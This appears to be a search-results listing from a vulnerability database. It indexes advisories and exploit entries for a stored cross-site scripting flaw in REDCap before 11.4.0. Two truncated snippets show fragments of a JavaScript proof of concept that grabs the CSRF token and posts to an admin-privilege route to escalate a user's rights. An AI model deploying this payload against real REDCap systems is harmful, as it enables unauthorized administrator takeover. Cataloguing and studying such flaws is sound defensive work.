4 matches found
REDCap 11.3.9 - Stored Cross Site Scripting Vulnerability
Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
Exploit Author: Kendrick Lam
References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
Vendor Homepage: https://projectredcap.org
Software Link: https://projectredcap.org
Version: REDCap before 11.4.0
Tested on: 11.2.5
CVE...
REDCap Cross-Site Scripting Vulnerability (CNVD-2022-81345)
A cross-site scripting vulnerability exists in versions of REDCap prior to 11.4.0. It stems from a lack of validation and filtering of user-supplied data and output in the program's missing data code functionality. An attacker could exploit this vulnerability to execute JavaScript code o...
REDCap Cross Site Scripting Vulnerability
REDCap versions prior to 11.4.0 suffer from a persistent cross site scripting vulnerability that can be leveraged to escalate privileges. Exploit Title: REDCap var target = document.location.host; var csrftoken = csrftoken; var userId = ''; // Replace with your user ID. function privesc var xhr =...
REDCap Cross Site Scripting
Exploit Title: REDCap var target = document.location.host; var csrftoken = csrftoken; var userId = ''; // Replace with your user ID. function privesc var xhr = new XMLHttpRequest; xhr.open"POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true;...